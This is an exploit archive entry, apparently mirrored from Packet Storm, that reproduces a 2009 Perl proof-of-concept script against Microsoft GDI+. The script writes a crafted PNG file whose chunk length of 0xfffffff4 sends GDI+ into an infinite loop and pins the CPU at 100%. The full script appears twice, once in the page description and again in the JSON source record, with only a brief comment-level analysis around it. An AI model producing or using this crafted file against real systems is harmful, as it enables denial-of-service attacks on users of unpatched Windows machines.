Search...

Microsoft GDI+ Denial Of Service

2009-04-17T00:00:00

ID PACKETSTORM:76770
Type packetstorm
Reporter vulnhunt.com
Modified 2009-04-17T00:00:00

Description

                                        
                                            `#! /usr/bin/perl  
#CAL_gdiplug_poc.pl  
#  
# Mircosoft_gdiplug_png_infinity_loop_D.o.S POC  
# by Code Audit Labs public 2009-04-17  
# http://www.vulnhunt.com/  
#   
#Affected  
#========  
#test on full updated winxp sp3  
#other version should be affected  
#  
#CVE: please assign to a CVE number  
#  
#DESCRIPTION  
#===========  
#  
# The vulnerability exists within the code in MicroSoft Gdi+ processing crafted png file. that cause infinity loop to cause high CPU(100%) and D.o.S .   
#  
#  
#ANALYSIS  
#========  
#  
# png chunk  
#  
# {  
# DWORD btChunkLen;  
# CHAR btChunkType[4];  
#} CHUNK_HEADER;  
  
#if btChunkLen is 0xfffffff4, would cause code fall into infinity loop  
#  
  
open(Fin, "&gt;poc.png") || die "can't create crash sample.$!";  
binmode(Fin);  
$data =   
"\x89\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52" .  
"\x00\x00\x03\x00\x00\x00\x04\x00\x08\x02\x00\x00\x00\xd9\x44\xa9" .  
"\x57\xff\xff\xff\xf4\x41\x41\x41\x41\x62\x01\x08\xcb\x06\x49\x3e" .  
"\xd7\x0a\x00\x22\xe3\xf1\x32\x3e\xe8";  
  
print Fin $data;  
  
close(Fin);  
  
  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:76770", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Microsoft GDI+ Denial Of Service", "description": "", "published": "2009-04-17T00:00:00", "modified": "2009-04-17T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/76770/Microsoft-GDI-Denial-Of-Service.html", "reporter": "vulnhunt.com", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:28:17", "viewCount": 1, "enchantments": {"score": {"value": -0.7, "vector": "NONE", "modified": "2016-11-03T10:28:17", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:28:17", "rev": 2}, "vulnersScore": -0.7}, "sourceHref": "https://packetstormsecurity.com/files/download/76770/CAL_gdiplug_poc.txt", "sourceData": "`#! /usr/bin/perl \n#CAL_gdiplug_poc.pl \n# \n# Mircosoft_gdiplug_png_infinity_loop_D.o.S POC \n# by Code Audit Labs public 2009-04-17 \n# http://www.vulnhunt.com/ \n# \n#Affected \n#======== \n#test on full updated winxp sp3 \n#other version should be affected \n# \n#CVE: please assign to a CVE number \n# \n#DESCRIPTION \n#=========== \n# \n# The vulnerability exists within the code in MicroSoft Gdi+ processing crafted png file. that cause infinity loop to cause high CPU(100%) and D.o.S . \n# \n# \n#ANALYSIS \n#======== \n# \n# png chunk \n# \n# { \n# DWORD btChunkLen; \n# CHAR btChunkType[4]; \n#} CHUNK_HEADER; \n \n#if btChunkLen is 0xfffffff4, would cause code fall into infinity loop \n# \n \nopen(Fin, \">poc.png\") || die \"can't create crash sample.$!\"; \nbinmode(Fin); \n$data = \n\"\\x89\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0d\\x49\\x48\\x44\\x52\" . \n\"\\x00\\x00\\x03\\x00\\x00\\x00\\x04\\x00\\x08\\x02\\x00\\x00\\x00\\xd9\\x44\\xa9\" . \n\"\\x57\\xff\\xff\\xff\\xf4\\x41\\x41\\x41\\x41\\x62\\x01\\x08\\xcb\\x06\\x49\\x3e\" . \n\"\\xd7\\x0a\\x00\\x22\\xe3\\xf1\\x32\\x3e\\xe8\"; \n \nprint Fin $data; \n \nclose(Fin); \n \n \n`\n", "immutableFields": []}